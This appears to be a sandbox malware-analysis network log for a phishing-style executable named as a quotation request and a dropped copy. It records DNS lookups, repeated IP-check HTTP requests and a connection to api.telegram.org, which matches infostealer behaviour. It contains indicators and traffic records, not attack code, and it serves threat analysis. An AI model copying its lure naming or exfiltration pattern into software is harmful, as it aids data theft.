                                                                                                                      Nov 21, 2024 12:20:46.446089029 CET49834443192.168.2.9149.154.167.220
                                                                                                                      Nov 21, 2024 12:20:47.795598984 CET4974980192.168.2.9193.122.6.168
                                                                                                                      Nov 21, 2024 12:20:51.645735025 CET4975780192.168.2.9193.122.6.168
                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                      Nov 21, 2024 12:20:10.580370903 CET5285653192.168.2.91.1.1.1
                                                                                                                      Nov 21, 2024 12:20:10.806102037 CET53528561.1.1.1192.168.2.9
                                                                                                                      Nov 21, 2024 12:20:12.831824064 CET5271953192.168.2.91.1.1.1
                                                                                                                      Nov 21, 2024 12:20:13.061778069 CET53527191.1.1.1192.168.2.9
                                                                                                                      Nov 21, 2024 12:20:40.397984028 CET5659453192.168.2.91.1.1.1
                                                                                                                      Nov 21, 2024 12:20:40.626763105 CET53565941.1.1.1192.168.2.9
                                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                      Nov 21, 2024 12:20:10.580370903 CET192.168.2.91.1.1.10x8269Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                                      Nov 21, 2024 12:20:12.831824064 CET192.168.2.91.1.1.10xb7fdStandard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                                                      Nov 21, 2024 12:20:40.397984028 CET192.168.2.91.1.1.10x5f2dStandard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                      Nov 21, 2024 12:20:03.905925989 CET1.1.1.1192.168.2.90xb190No error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                      Nov 21, 2024 12:20:03.905925989 CET1.1.1.1192.168.2.90xb190No error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                                                                                                      Nov 21, 2024 12:20:10.806102037 CET1.1.1.1192.168.2.90x8269No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                      Nov 21, 2024 12:20:10.806102037 CET1.1.1.1192.168.2.90x8269No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                                      Nov 21, 2024 12:20:10.806102037 CET1.1.1.1192.168.2.90x8269No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                                      Nov 21, 2024 12:20:10.806102037 CET1.1.1.1192.168.2.90x8269No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                                      Nov 21, 2024 12:20:10.806102037 CET1.1.1.1192.168.2.90x8269No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                                      Nov 21, 2024 12:20:10.806102037 CET1.1.1.1192.168.2.90x8269No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                                      Nov 21, 2024 12:20:13.061778069 CET1.1.1.1192.168.2.90xb7fdNo error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                      Nov 21, 2024 12:20:13.061778069 CET1.1.1.1192.168.2.90xb7fdNo error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                      Nov 21, 2024 12:20:40.626763105 CET1.1.1.1192.168.2.90x5f2dNo error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                                                                      • reallyfreegeoip.org
                                                                                                                      • api.telegram.org
                                                                                                                      • checkip.dyndns.org
                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      0192.168.2.949720193.122.6.168807264C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Nov 21, 2024 12:20:10.945334911 CET151OUTGET / HTTP/1.1
                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                      Host: checkip.dyndns.org
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Nov 21, 2024 12:20:12.316953897 CET320INHTTP/1.1 200 OK
                                                                                                                      Date: Thu, 21 Nov 2024 11:20:12 GMT
                                                                                                                      Content-Type: text/html
                                                                                                                      Content-Length: 103
                                                                                                                      Connection: keep-alive
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Pragma: no-cache
                                                                                                                      X-Request-ID: 6f9c98db4db17b8edecb9382a2f079bf
                                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>
                                                                                                                      Nov 21, 2024 12:20:12.348850012 CET127OUTGET / HTTP/1.1
                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                      Host: checkip.dyndns.org
                                                                                                                      Nov 21, 2024 12:20:12.764905930 CET320INHTTP/1.1 200 OK
                                                                                                                      Date: Thu, 21 Nov 2024 11:20:12 GMT
                                                                                                                      Content-Type: text/html
                                                                                                                      Content-Length: 103
                                                                                                                      Connection: keep-alive
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Pragma: no-cache
                                                                                                                      X-Request-ID: 1b7126e10304727dd26c7668f5e9262c
                                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>
                                                                                                                      Nov 21, 2024 12:20:14.800216913 CET127OUTGET / HTTP/1.1
                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                      Host: checkip.dyndns.org
                                                                                                                      Nov 21, 2024 12:20:15.215023041 CET320INHTTP/1.1 200 OK
                                                                                                                      Date: Thu, 21 Nov 2024 11:20:15 GMT
                                                                                                                      Content-Type: text/html
                                                                                                                      Content-Length: 103
                                                                                                                      Connection: keep-alive
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Pragma: no-cache
                                                                                                                      X-Request-ID: aac08bdb88d1af356277b2b849c4855f
                                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      1192.168.2.949740193.122.6.168807636C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Nov 21, 2024 12:20:16.389971972 CET151OUTGET / HTTP/1.1
                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                      Host: checkip.dyndns.org
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Nov 21, 2024 12:20:17.657229900 CET320INHTTP/1.1 200 OK
                                                                                                                      Date: Thu, 21 Nov 2024 11:20:17 GMT
                                                                                                                      Content-Type: text/html
                                                                                                                      Content-Length: 103
                                                                                                                      Connection: keep-alive
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Pragma: no-cache
                                                                                                                      X-Request-ID: 0399e6ef3bc1751baf4b7ef2e3486b3d
                                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>
                                                                                                                      Nov 21, 2024 12:20:17.661041021 CET127OUTGET / HTTP/1.1
                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                      Host: checkip.dyndns.org
                                                                                                                      Nov 21, 2024 12:20:18.065586090 CET320INHTTP/1.1 200 OK
                                                                                                                      Date: Thu, 21 Nov 2024 11:20:17 GMT
                                                                                                                      Content-Type: text/html
                                                                                                                      Content-Length: 103
                                                                                                                      Connection: keep-alive
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Pragma: no-cache
                                                                                                                      X-Request-ID: c02afbc6c6fba24cd78ef94619c2247f
                                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>
                                                                                                                      Nov 21, 2024 12:20:20.016134024 CET127OUTGET / HTTP/1.1
                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                      Host: checkip.dyndns.org
                                                                                                                      Nov 21, 2024 12:20:20.421189070 CET320INHTTP/1.1 200 OK
                                                                                                                      Date: Thu, 21 Nov 2024 11:20:20 GMT
                                                                                                                      Content-Type: text/html
                                                                                                                      Content-Length: 103
                                                                                                                      Connection: keep-alive
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Pragma: no-cache
                                                                                                                      X-Request-ID: 45dbae6b2dfffb6a8b7eea0dddefcbf6
                                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      2192.168.2.949741193.122.6.168807264C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Nov 21, 2024 12:20:17.064600945 CET127OUTGET / HTTP/1.1
                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                      Host: checkip.dyndns.org
                                                                                                                      Nov 21, 2024 12:20:18.424809933 CET320INHTTP/1.1 200 OK
                                                                                                                      Date: Thu, 21 Nov 2024 11:20:18 GMT
                                                                                                                      Content-Type: text/html
                                                                                                                      Content-Length: 103
                                                                                                                      Connection: keep-alive
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Pragma: no-cache
                                                                                                                      X-Request-ID: 7b1a15f6ddffc63825829fe255e17736
                                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      3192.168.2.949749193.122.6.168807264C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Nov 21, 2024 12:20:20.337147951 CET127OUTGET / HTTP/1.1
                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                      Host: checkip.dyndns.org
                                                                                                                      Nov 21, 2024 12:20:21.602137089 CET320INHTTP/1.1 200 OK
                                                                                                                      Date: Thu, 21 Nov 2024 11:20:21 GMT
                                                                                                                      Content-Type: text/html
                                                                                                                      Content-Length: 103
                                                                                                                      Connection: keep-alive
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Pragma: no-cache
                                                                                                                      X-Request-ID: 041b7532b02b76f47a17e92bf0ce60fc
                                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      4192.168.2.949757193.122.6.168807636C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Nov 21, 2024 12:20:22.263870001 CET127OUTGET / HTTP/1.1
                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                      Host: checkip.dyndns.org
                                                                                                                      Nov 21, 2024 12:20:23.575783014 CET320INHTTP/1.1 200 OK
                                                                                                                      Date: Thu, 21 Nov 2024 11:20:23 GMT
                                                                                                                      Content-Type: text/html
                                                                                                                      Content-Length: 103
                                                                                                                      Connection: keep-alive
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Pragma: no-cache
                                                                                                                      X-Request-ID: 1dabcba68772dd7f6f20f63cfd75e416
                                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      5192.168.2.949763193.122.6.168807264C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Nov 21, 2024 12:20:23.503763914 CET151OUTGET / HTTP/1.1
                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                      Host: checkip.dyndns.org
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Nov 21, 2024 12:20:24.868138075 CET320INHTTP/1.1 200 OK
                                                                                                                      Date: Thu, 21 Nov 2024 11:20:24 GMT
                                                                                                                      Content-Type: text/html
                                                                                                                      Content-Length: 103
                                                                                                                      Connection: keep-alive
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Pragma: no-cache
                                                                                                                      X-Request-ID: 65fc6866921be238ceca53196561cea0
                                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      6192.168.2.949773193.122.6.168807636C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Nov 21, 2024 12:20:25.473340034 CET151OUTGET / HTTP/1.1
                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                      Host: checkip.dyndns.org
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Nov 21, 2024 12:20:26.785577059 CET320INHTTP/1.1 200 OK
                                                                                                                      Date: Thu, 21 Nov 2024 11:20:26 GMT
                                                                                                                      Content-Type: text/html
                                                                                                                      Content-Length: 103
                                                                                                                      Connection: keep-alive
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Pragma: no-cache
                                                                                                                      X-Request-ID: 50b650adf8ee9d6841504a381bf40097
                                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      7192.168.2.949774193.122.6.168807264C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Nov 21, 2024 12:20:26.765824080 CET151OUTGET / HTTP/1.1
                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                      Host: checkip.dyndns.org
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Nov 21, 2024 12:20:28.079519033 CET320INHTTP/1.1 200 OK
                                                                                                                      Date: Thu, 21 Nov 2024 11:20:27 GMT
                                                                                                                      Content-Type: text/html
                                                                                                                      Content-Length: 103
                                                                                                                      Connection: keep-alive
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Pragma: no-cache
                                                                                                                      X-Request-ID: 459377dca5f281b431f51ff12d59e194
                                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      8192.168.2.949782193.122.6.168807636C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Nov 21, 2024 12:20:28.631906986 CET151OUTGET / HTTP/1.1
                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                      Host: checkip.dyndns.org
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Nov 21, 2024 12:20:29.944485903 CET320INHTTP/1.1 200 OK
                                                                                                                      Date: Thu, 21 Nov 2024 11:20:29 GMT
                                                                                                                      Content-Type: text/html
                                                                                                                      Content-Length: 103
                                                                                                                      Connection: keep-alive
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Pragma: no-cache
                                                                                                                      X-Request-ID: b3b0e57f9745a25611c0039653cd72d5
                                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      9192.168.2.949788193.122.6.168807264C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Nov 21, 2024 12:20:29.930200100 CET151OUTGET / HTTP/1.1
                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                      Host: checkip.dyndns.org
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Nov 21, 2024 12:20:32.242924929 CET320INHTTP/1.1 200 OK
                                                                                                                      Date: Thu, 21 Nov 2024 11:20:32 GMT
                                                                                                                      Content-Type: text/html
                                                                                                                      Content-Length: 103
                                                                                                                      Connection: keep-alive
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Pragma: no-cache
                                                                                                                      X-Request-ID: 5fc41760e94a8ec5fcd515fdf6d0b4f7
                                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      10192.168.2.949790193.122.6.168807636C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Nov 21, 2024 12:20:31.786822081 CET151OUTGET / HTTP/1.1
                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                      Host: checkip.dyndns.org
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Nov 21, 2024 12:20:33.099962950 CET320INHTTP/1.1 200 OK
                                                                                                                      Date: Thu, 21 Nov 2024 11:20:32 GMT
                                                                                                                      Content-Type: text/html
                                                                                                                      Content-Length: 103
                                                                                                                      Connection: keep-alive
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Pragma: no-cache
                                                                                                                      X-Request-ID: d4c9bb543294d8b219ba0fb3c0e6aed2
                                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      11192.168.2.949798193.122.6.168807264C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Nov 21, 2024 12:20:34.153079033 CET151OUTGET / HTTP/1.1
                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                      Host: checkip.dyndns.org
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Nov 21, 2024 12:20:35.511667013 CET320INHTTP/1.1 200 OK
                                                                                                                      Date: Thu, 21 Nov 2024 11:20:35 GMT
                                                                                                                      Content-Type: text/html
                                                                                                                      Content-Length: 103
                                                                                                                      Connection: keep-alive
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Pragma: no-cache
                                                                                                                      X-Request-ID: fe0f7480b66c3fbf3a3d69bb7c34da72
                                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      12192.168.2.949804193.122.6.168807636C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Nov 21, 2024 12:20:34.969331980 CET151OUTGET / HTTP/1.1
                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                      Host: checkip.dyndns.org
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Nov 21, 2024 12:20:36.235622883 CET320INHTTP/1.1 200 OK
                                                                                                                      Date: Thu, 21 Nov 2024 11:20:36 GMT
                                                                                                                      Content-Type: text/html
                                                                                                                      Content-Length: 103
                                                                                                                      Connection: keep-alive
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Pragma: no-cache
                                                                                                                      X-Request-ID: d2fde82cdcee36fd7838173e8cd2063e
                                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      13192.168.2.949812193.122.6.168807264C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe
                                                                                                                      TimestampBytes transferredDirectionData
